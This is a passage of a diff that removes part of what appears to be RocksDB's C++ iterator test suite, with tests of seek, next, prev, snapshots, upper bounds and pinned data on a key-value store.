-    Iterator* iter = db_->NewIterator(ReadOptions(), handles_[1]);
-
-    iter->SeekToFirst();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->SeekToLast();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->Seek("foo");
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->SeekForPrev("foo");
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    delete iter;
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBIteratorTest, IterSingle) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "a", "va"));
-    Iterator* iter = db_->NewIterator(ReadOptions(), handles_[1]);
-
-    iter->SeekToFirst();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekToFirst();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->SeekToLast();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekToLast();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->Seek("");
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekForPrev("");
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->Seek("a");
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekForPrev("a");
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->Seek("b");
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekForPrev("b");
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    delete iter;
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBIteratorTest, IterMulti) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "a", "va"));
-    ASSERT_OK(Put(1, "b", "vb"));
-    ASSERT_OK(Put(1, "c", "vc"));
-    Iterator* iter = db_->NewIterator(ReadOptions(), handles_[1]);
-
-    iter->SeekToFirst();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekToFirst();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->SeekToLast();
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekToLast();
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->Seek("");
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Seek("a");
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Seek("ax");
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-    iter->SeekForPrev("d");
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->SeekForPrev("c");
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->SeekForPrev("bx");
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-
-    iter->Seek("b");
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-    iter->Seek("z");
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekForPrev("b");
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-    iter->SeekForPrev("");
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    // Switch from reverse to forward
-    iter->SeekToLast();
-    iter->Prev();
-    iter->Prev();
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-
-    // Switch from forward to reverse
-    iter->SeekToFirst();
-    iter->Next();
-    iter->Next();
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-
-    // Make sure iter stays at snapshot
-    ASSERT_OK(Put(1, "a", "va2"));
-    ASSERT_OK(Put(1, "a2", "va3"));
-    ASSERT_OK(Put(1, "b", "vb2"));
-    ASSERT_OK(Put(1, "c", "vc2"));
-    ASSERT_OK(Delete(1, "b"));
-    iter->SeekToFirst();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekToLast();
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    delete iter;
-  } while (ChangeCompactOptions());
-}
-
-// Check that we can skip over a run of user keys
-// by using reseek rather than sequential scan
-TEST_F(DBIteratorTest, IterReseek) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  Options options = CurrentOptions(options_override);
-  options.max_sequential_skip_in_iterations = 3;
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // insert three keys with same userkey and verify that
-  // reseek is not invoked. For each of these test cases,
-  // verify that we can find the next key "b".
-  ASSERT_OK(Put(1, "a", "zero"));
-  ASSERT_OK(Put(1, "a", "one"));
-  ASSERT_OK(Put(1, "a", "two"));
-  ASSERT_OK(Put(1, "b", "bone"));
-  Iterator* iter = db_->NewIterator(ReadOptions(), handles_[1]);
-  iter->SeekToFirst();
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 0);
-  ASSERT_EQ(IterStatus(iter), "a->two");
-  iter->Next();
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 0);
-  ASSERT_EQ(IterStatus(iter), "b->bone");
-  delete iter;
-
-  // insert a total of three keys with same userkey and verify
-  // that reseek is still not invoked.
-  ASSERT_OK(Put(1, "a", "three"));
-  iter = db_->NewIterator(ReadOptions(), handles_[1]);
-  iter->SeekToFirst();
-  ASSERT_EQ(IterStatus(iter), "a->three");
-  iter->Next();
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 0);
-  ASSERT_EQ(IterStatus(iter), "b->bone");
-  delete iter;
-
-  // insert a total of four keys with same userkey and verify
-  // that reseek is invoked.
-  ASSERT_OK(Put(1, "a", "four"));
-  iter = db_->NewIterator(ReadOptions(), handles_[1]);
-  iter->SeekToFirst();
-  ASSERT_EQ(IterStatus(iter), "a->four");
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 0);
-  iter->Next();
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 1);
-  ASSERT_EQ(IterStatus(iter), "b->bone");
-  delete iter;
-
-  // Testing reverse iterator
-  // At this point, we have three versions of "a" and one version of "b".
-  // The reseek statistics is already at 1.
-  int num_reseeks = static_cast<int>(
-      TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION));
-
-  // Insert another version of b and assert that reseek is not invoked
-  ASSERT_OK(Put(1, "b", "btwo"));
-  iter = db_->NewIterator(ReadOptions(), handles_[1]);
-  iter->SeekToLast();
-  ASSERT_EQ(IterStatus(iter), "b->btwo");
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION),
-            num_reseeks);
-  iter->Prev();
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION),
-            num_reseeks + 1);
-  ASSERT_EQ(IterStatus(iter), "a->four");
-  delete iter;
-
-  // insert two more versions of b. This makes a total of 4 versions
-  // of b and 4 versions of a.
-  ASSERT_OK(Put(1, "b", "bthree"));
-  ASSERT_OK(Put(1, "b", "bfour"));
-  iter = db_->NewIterator(ReadOptions(), handles_[1]);
-  iter->SeekToLast();
-  ASSERT_EQ(IterStatus(iter), "b->bfour");
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION),
-            num_reseeks + 2);
-  iter->Prev();
-
-  // the previous Prev call should have invoked reseek
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION),
-            num_reseeks + 3);
-  ASSERT_EQ(IterStatus(iter), "a->four");
-  delete iter;
-}
-
-TEST_F(DBIteratorTest, IterSmallAndLargeMix) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "a", "va"));
-    ASSERT_OK(Put(1, "b", std::string(100000, 'b')));
-    ASSERT_OK(Put(1, "c", "vc"));
-    ASSERT_OK(Put(1, "d", std::string(100000, 'd')));
-    ASSERT_OK(Put(1, "e", std::string(100000, 'e')));
-
-    Iterator* iter = db_->NewIterator(ReadOptions(), handles_[1]);
-
-    iter->SeekToFirst();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "b->" + std::string(100000, 'b'));
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "d->" + std::string(100000, 'd'));
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "e->" + std::string(100000, 'e'));
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->SeekToLast();
-    ASSERT_EQ(IterStatus(iter), "e->" + std::string(100000, 'e'));
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "d->" + std::string(100000, 'd'));
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "b->" + std::string(100000, 'b'));
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    delete iter;
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBIteratorTest, IterMultiWithDelete) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "ka", "va"));
-    ASSERT_OK(Put(1, "kb", "vb"));
-    ASSERT_OK(Put(1, "kc", "vc"));
-    ASSERT_OK(Delete(1, "kb"));
-    ASSERT_EQ("NOT_FOUND", Get(1, "kb"));
-
-    Iterator* iter = db_->NewIterator(ReadOptions(), handles_[1]);
-    iter->Seek("kc");
-    ASSERT_EQ(IterStatus(iter), "kc->vc");
-    if (!CurrentOptions().merge_operator) {
-      // TODO: merge operator does not support backward iteration yet
-      if (kPlainTableAllBytesPrefix != option_config_ &&
-          kBlockBasedTableWithWholeKeyHashIndex != option_config_ &&
-          kHashLinkList != option_config_ &&
-          kHashSkipList != option_config_) {  // doesn't support SeekToLast
-        iter->Prev();
-        ASSERT_EQ(IterStatus(iter), "ka->va");
-      }
-    }
-    delete iter;
-  } while (ChangeOptions());
-}
-
-TEST_F(DBIteratorTest, IterPrevMaxSkip) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    for (int i = 0; i < 2; i++) {
-      ASSERT_OK(Put(1, "key1", "v1"));
-      ASSERT_OK(Put(1, "key2", "v2"));
-      ASSERT_OK(Put(1, "key3", "v3"));
-      ASSERT_OK(Put(1, "key4", "v4"));
-      ASSERT_OK(Put(1, "key5", "v5"));
-    }
-
-    VerifyIterLast("key5->v5", 1);
-
-    ASSERT_OK(Delete(1, "key5"));
-    VerifyIterLast("key4->v4", 1);
-
-    ASSERT_OK(Delete(1, "key4"));
-    VerifyIterLast("key3->v3", 1);
-
-    ASSERT_OK(Delete(1, "key3"));
-    VerifyIterLast("key2->v2", 1);
-
-    ASSERT_OK(Delete(1, "key2"));
-    VerifyIterLast("key1->v1", 1);
-
-    ASSERT_OK(Delete(1, "key1"));
-    VerifyIterLast("(invalid)", 1);
-  } while (ChangeOptions(kSkipMergePut | kSkipNoSeekToLast));
-}
-
-TEST_F(DBIteratorTest, IterWithSnapshot) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions(options_override));
-    ASSERT_OK(Put(1, "key1", "val1"));
-    ASSERT_OK(Put(1, "key2", "val2"));
-    ASSERT_OK(Put(1, "key3", "val3"));
-    ASSERT_OK(Put(1, "key4", "val4"));
-    ASSERT_OK(Put(1, "key5", "val5"));
-
-    const Snapshot* snapshot = db_->GetSnapshot();
-    ReadOptions options;
-    options.snapshot = snapshot;
-    Iterator* iter = db_->NewIterator(options, handles_[1]);
-
-    ASSERT_OK(Put(1, "key0", "val0"));
-    // Put more values after the snapshot
-    ASSERT_OK(Put(1, "key100", "val100"));
-    ASSERT_OK(Put(1, "key101", "val101"));
-
-    iter->Seek("key5");
-    ASSERT_EQ(IterStatus(iter), "key5->val5");
-    if (!CurrentOptions().merge_operator) {
-      // TODO: merge operator does not support backward iteration yet
-      if (kPlainTableAllBytesPrefix != option_config_ &&
-          kBlockBasedTableWithWholeKeyHashIndex != option_config_ &&
-          kHashLinkList != option_config_ && kHashSkipList != option_config_) {
-        iter->Prev();
-        ASSERT_EQ(IterStatus(iter), "key4->val4");
-        iter->Prev();
-        ASSERT_EQ(IterStatus(iter), "key3->val3");
-
-        iter->Next();
-        ASSERT_EQ(IterStatus(iter), "key4->val4");
-        iter->Next();
-        ASSERT_EQ(IterStatus(iter), "key5->val5");
-      }
-      iter->Next();
-      ASSERT_TRUE(!iter->Valid());
-    }
-
-    if (!CurrentOptions().merge_operator) {
-      // TODO(gzh): merge operator does not support backward iteration yet
-      if (kPlainTableAllBytesPrefix != option_config_ &&
-          kBlockBasedTableWithWholeKeyHashIndex != option_config_ &&
-          kHashLinkList != option_config_ && kHashSkipList != option_config_) {
-        iter->SeekForPrev("key1");
-        ASSERT_EQ(IterStatus(iter), "key1->val1");
-        iter->Next();
-        ASSERT_EQ(IterStatus(iter), "key2->val2");
-        iter->Next();
-        ASSERT_EQ(IterStatus(iter), "key3->val3");
-        iter->Prev();
-        ASSERT_EQ(IterStatus(iter), "key2->val2");
-        iter->Prev();
-        ASSERT_EQ(IterStatus(iter), "key1->val1");
-        iter->Prev();
-        ASSERT_TRUE(!iter->Valid());
-      }
-    }
-    db_->ReleaseSnapshot(snapshot);
-    delete iter;
-    // skip as HashCuckooRep does not support snapshot
-  } while (ChangeOptions(kSkipHashCuckoo));
-}
-
-TEST_F(DBIteratorTest, IteratorPinsRef) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    Put(1, "foo", "hello");
-
-    // Get iterator that will yield the current contents of the DB.
-    Iterator* iter = db_->NewIterator(ReadOptions(), handles_[1]);
-
-    // Write to force compactions
-    Put(1, "foo", "newvalue1");
-    for (int i = 0; i < 100; i++) {
-      // 100K values
-      ASSERT_OK(Put(1, Key(i), Key(i) + std::string(100000, 'v')));
-    }
-    Put(1, "foo", "newvalue2");
-
-    iter->SeekToFirst();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("foo", iter->key().ToString());
-    ASSERT_EQ("hello", iter->value().ToString());
-    iter->Next();
-    ASSERT_TRUE(!iter->Valid());
-    delete iter;
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBIteratorTest, DBIteratorBoundTest) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-
-  options.prefix_extractor = nullptr;
-  DestroyAndReopen(options);
-  ASSERT_OK(Put("a", "0"));
-  ASSERT_OK(Put("foo", "bar"));
-  ASSERT_OK(Put("foo1", "bar1"));
-  ASSERT_OK(Put("g1", "0"));
-
-  // testing basic case with no iterate_upper_bound and no prefix_extractor
-  {
-    ReadOptions ro;
-    ro.iterate_upper_bound = nullptr;
-
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ro));
-
-    iter->Seek("foo");
-
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("foo")), 0);
-
-    iter->Next();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("foo1")), 0);
-
-    iter->Next();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("g1")), 0);
-
-    iter->SeekForPrev("g1");
-
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("g1")), 0);
-
-    iter->Prev();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("foo1")), 0);
-
-    iter->Prev();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("foo")), 0);
-  }
-
-  // testing iterate_upper_bound and forward iterator
-  // to make sure it stops at bound
-  {
-    ReadOptions ro;
-    // iterate_upper_bound points beyond the last expected entry
-    Slice prefix("foo2");
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ro));
-
-    iter->Seek("foo");
-
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("foo")), 0);
-
-    iter->Next();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(("foo1")), 0);
-
-    iter->Next();
-    // should stop here...
-    ASSERT_TRUE(!iter->Valid());
-  }
-  // Testing SeekToLast with iterate_upper_bound set
-  {
-    ReadOptions ro;
-
-    Slice prefix("foo");
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ro));
-
-    iter->SeekToLast();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("a")), 0);
-  }
-
-  // prefix is the first letter of the key
-  options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-
-  DestroyAndReopen(options);
-  ASSERT_OK(Put("a", "0"));
-  ASSERT_OK(Put("foo", "bar"));
-  ASSERT_OK(Put("foo1", "bar1"));
-  ASSERT_OK(Put("g1", "0"));
-
-  // testing with iterate_upper_bound and prefix_extractor
-  // Seek target and iterate_upper_bound are not is same prefix
-  // This should be an error
-  {
-    ReadOptions ro;
-    Slice upper_bound("g");
-    ro.iterate_upper_bound = &upper_bound;
-
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ro));
-
-    iter->Seek("foo");
-
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("foo", iter->key().ToString());
-
-    iter->Next();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("foo1", iter->key().ToString());
-
-    iter->Next();
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  // testing that iterate_upper_bound prevents iterating over deleted items
-  // if the bound has already reached
-  {
-    options.prefix_extractor = nullptr;
-    DestroyAndReopen(options);
-    ASSERT_OK(Put("a", "0"));
-    ASSERT_OK(Put("b", "0"));
-    ASSERT_OK(Put("b1", "0"));
-    ASSERT_OK(Put("c", "0"));
-    ASSERT_OK(Put("d", "0"));
-    ASSERT_OK(Put("e", "0"));
-    ASSERT_OK(Delete("c"));
-    ASSERT_OK(Delete("d"));
-
-    // base case with no bound
-    ReadOptions ro;
-    ro.iterate_upper_bound = nullptr;
-
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ro));
-
-    iter->Seek("b");
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("b")), 0);
-
-    iter->Next();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(("b1")), 0);
-
-    get_perf_context()->Reset();
-    iter->Next();
-
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(static_cast<int>(get_perf_context()->internal_delete_skipped_count), 2);
-
-    // now testing with iterate_bound
-    Slice prefix("c");
-    ro.iterate_upper_bound = &prefix;
-
-    iter.reset(db_->NewIterator(ro));
-
-    get_perf_context()->Reset();
-
-    iter->Seek("b");
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("b")), 0);
-
-    iter->Next();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(("b1")), 0);
-
-    iter->Next();
-    // the iteration should stop as soon as the bound key is reached
-    // even though the key is deleted
-    // hence internal_delete_skipped_count should be 0
-    ASSERT_TRUE(!iter->Valid());
-    ASSERT_EQ(static_cast<int>(get_perf_context()->internal_delete_skipped_count), 0);
-  }
-}
-
-TEST_F(DBIteratorTest, DBIteratorBoundOptimizationTest) {
-  int upper_bound_hits = 0;
-  Options options = CurrentOptions();
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "BlockBasedTable::BlockEntryIteratorState::KeyReachedUpperBound",
-      [&upper_bound_hits](void* arg) {
-        assert(arg != nullptr);
-        upper_bound_hits += (*static_cast<bool*>(arg) ? 1 : 0);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.prefix_extractor = nullptr;
-  BlockBasedTableOptions table_options;
-  table_options.flush_block_policy_factory =
-    std::make_shared<FlushBlockEveryKeyPolicyFactory>();
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  DestroyAndReopen(options);
-  ASSERT_OK(Put("foo1", "bar1"));
-  ASSERT_OK(Put("foo2", "bar2"));
-  ASSERT_OK(Put("foo4", "bar4"));
-  ASSERT_OK(Flush());
-
-  Slice ub("foo3");
-  ReadOptions ro;
-  ro.iterate_upper_bound = &ub;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(ro));
-
-  iter->Seek("foo");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("foo1")), 0);
-  ASSERT_EQ(upper_bound_hits, 0);
-
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("foo2")), 0);
-  ASSERT_EQ(upper_bound_hits, 0);
-
-  iter->Next();
-  ASSERT_FALSE(iter->Valid());
-  ASSERT_EQ(upper_bound_hits, 1);
-}
-// TODO(3.13): fix the issue of Seek() + Prev() which might not necessary
-//             return the biggest key which is smaller than the seek key.
-TEST_F(DBIteratorTest, PrevAfterAndNextAfterMerge) {
-  Options options;
-  options.create_if_missing = true;
-  options.merge_operator = MergeOperators::CreatePutOperator();
-  options.env = env_;
-  DestroyAndReopen(options);
-
-  // write three entries with different keys using Merge()
-  WriteOptions wopts;
-  db_->Merge(wopts, "1", "data1");
-  db_->Merge(wopts, "2", "data2");
-  db_->Merge(wopts, "3", "data3");
-
-  std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-
-  it->Seek("2");
-  ASSERT_TRUE(it->Valid());
-  ASSERT_EQ("2", it->key().ToString());
-
-  it->Prev();
-  ASSERT_TRUE(it->Valid());
-  ASSERT_EQ("1", it->key().ToString());
-
-  it->SeekForPrev("1");
-  ASSERT_TRUE(it->Valid());
-  ASSERT_EQ("1", it->key().ToString());
-
-  it->Next();
-  ASSERT_TRUE(it->Valid());
-  ASSERT_EQ("2", it->key().ToString());
-}
-
-TEST_F(DBIteratorTest, PinnedDataIteratorRandomized) {
-  enum TestConfig {
-    NORMAL,
-    CLOSE_AND_OPEN,
-    COMPACT_BEFORE_READ,
-    FLUSH_EVERY_1000,
-    MAX
-  };
-
-  // Generate Random data
-  Random rnd(301);
-
-  int puts = 100000;
-  int key_pool = static_cast<int>(puts * 0.7);
-  int key_size = 100;
-  int val_size = 1000;
-  int seeks_percentage = 20;   // 20% of keys will be used to test seek()
-  int delete_percentage = 20;  // 20% of keys will be deleted
-  int merge_percentage = 20;   // 20% of keys will be added using Merge()
-
-  for (int run_config = 0; run_config < TestConfig::MAX; run_config++) {
-    Options options = CurrentOptions();
-    BlockBasedTableOptions table_options;
-    table_options.use_delta_encoding = false;
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    options.merge_operator = MergeOperators::CreatePutOperator();
-    DestroyAndReopen(options);
-
-    std::vector<std::string> generated_keys(key_pool);
-    for (int i = 0; i < key_pool; i++) {
-      generated_keys[i] = RandomString(&rnd, key_size);
-    }
-
-    std::map<std::string, std::string> true_data;
-    std::vector<std::string> random_keys;
-    std::vector<std::string> deleted_keys;
-    for (int i = 0; i < puts; i++) {
-      auto& k = generated_keys[rnd.Next() % key_pool];
-      auto v = RandomString(&rnd, val_size);
-
-      // Insert data to true_data map and to DB
-      true_data[k] = v;
-      if (rnd.OneIn(static_cast<int>(100.0 / merge_percentage))) {
-        ASSERT_OK(db_->Merge(WriteOptions(), k, v));
-      } else {
-        ASSERT_OK(Put(k, v));
-      }
-
-      // Pick random keys to be used to test Seek()
-      if (rnd.OneIn(static_cast<int>(100.0 / seeks_percentage))) {
-        random_keys.push_back(k);
-      }
-
-      // Delete some random keys
-      if (rnd.OneIn(static_cast<int>(100.0 / delete_percentage))) {
-        deleted_keys.push_back(k);
-        true_data.erase(k);
-        ASSERT_OK(Delete(k));
-      }
-
-      if (run_config == TestConfig::FLUSH_EVERY_1000) {
-        if (i && i % 1000 == 0) {
-          Flush();
-        }
-      }
-    }
-
-    if (run_config == TestConfig::CLOSE_AND_OPEN) {
-      Close();
-      Reopen(options);
-    } else if (run_config == TestConfig::COMPACT_BEFORE_READ) {
-      db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    }
-
-    ReadOptions ro;
-    ro.pin_data = true;
-    auto iter = db_->NewIterator(ro);
-
-    {
-      // Test Seek to random keys
-      std::vector<Slice> keys_slices;
-      std::vector<std::string> true_keys;
-      for (auto& k : random_keys) {
-        iter->Seek(k);
-        if (!iter->Valid()) {
-          ASSERT_EQ(true_data.lower_bound(k), true_data.end());
-          continue;
-        }
-        std::string prop_value;
-        ASSERT_OK(
-            iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-        ASSERT_EQ("1", prop_value);
-        keys_slices.push_back(iter->key());
-        true_keys.push_back(true_data.lower_bound(k)->first);
-      }
-
-      for (size_t i = 0; i < keys_slices.size(); i++) {
-        ASSERT_EQ(keys_slices[i].ToString(), true_keys[i]);
-      }
-    }
-
-    {
-      // Test SeekForPrev to random keys
-      std::vector<Slice> keys_slices;
-      std::vector<std::string> true_keys;
-      for (auto& k : random_keys) {
-        iter->SeekForPrev(k);
-        if (!iter->Valid()) {
-          ASSERT_EQ(true_data.upper_bound(k), true_data.begin());
-          continue;
-        }
-        std::string prop_value;
-        ASSERT_OK(
-            iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-        ASSERT_EQ("1", prop_value);
-        keys_slices.push_back(iter->key());
-        true_keys.push_back((--true_data.upper_bound(k))->first);
-      }
-
-      for (size_t i = 0; i < keys_slices.size(); i++) {
-        ASSERT_EQ(keys_slices[i].ToString(), true_keys[i]);
-      }
-    }
-
-    {
-      // Test iterating all data forward
-      std::vector<Slice> all_keys;
-      for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-        std::string prop_value;
-        ASSERT_OK(
-            iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-        ASSERT_EQ("1", prop_value);
-        all_keys.push_back(iter->key());
-      }
-      ASSERT_EQ(all_keys.size(), true_data.size());
-
-      // Verify that all keys slices are valid
-      auto data_iter = true_data.begin();
-      for (size_t i = 0; i < all_keys.size(); i++) {
-        ASSERT_EQ(all_keys[i].ToString(), data_iter->first);
-        data_iter++;
-      }
-    }
-
-    {
-      // Test iterating all data backward
-      std::vector<Slice> all_keys;
-      for (iter->SeekToLast(); iter->Valid(); iter->Prev()) {
-        std::string prop_value;
-        ASSERT_OK(
-            iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-        ASSERT_EQ("1", prop_value);
-        all_keys.push_back(iter->key());
-      }
-      ASSERT_EQ(all_keys.size(), true_data.size());
-
-      // Verify that all keys slices are valid (backward)
-      auto data_iter = true_data.rbegin();
-      for (size_t i = 0; i < all_keys.size(); i++) {
-        ASSERT_EQ(all_keys[i].ToString(), data_iter->first);
-        data_iter++;
-      }
-    }
-
-    delete iter;
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBIteratorTest, PinnedDataIteratorMultipleFiles) {
-  Options options = CurrentOptions();
-  BlockBasedTableOptions table_options;
-  table_options.use_delta_encoding = false;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = 1024 * 1024 * 10;  // 10 Mb
-  DestroyAndReopen(options);
-
-  std::map<std::string, std::string> true_data;
-
-  // Generate 4 sst files in L2
-  Random rnd(301);
-  for (int i = 1; i <= 1000; i++) {
-    std::string k = Key(i * 3);
-    std::string v = RandomString(&rnd, 100);
-    ASSERT_OK(Put(k, v));
-    true_data[k] = v;
-    if (i % 250 == 0) {
